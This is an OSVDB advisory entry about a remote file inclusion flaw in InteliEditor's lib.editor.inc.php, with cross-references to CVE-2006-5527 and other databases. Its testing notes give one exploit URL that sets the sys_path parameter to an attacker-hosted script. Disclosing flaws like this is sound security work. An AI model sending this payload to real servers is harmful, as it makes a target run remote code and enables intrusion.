InteliEditor lib.editor.inc.php sys_path Variable Remote File Inclusion

2006-10-24T07:18:47
ID OSVDB:30011
Type osvdb
Reporter OSVDB
Modified 2006-10-24T07:18:47

Description

Manual Testing Notes

http://[target]/[script_path]/lib.editor.inc.php?sys_path=http://evil_script?

References:

Security Tracker: 1017117
Secunia Advisory ID: 22428
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0410.html
ISS X-Force ID: 29755
Generic Exploit URL: http://www.milw0rm.com/exploits/2630
FrSIRT Advisory: ADV-2006-4179
CVE-2006-5527
Bugtraq ID: 20703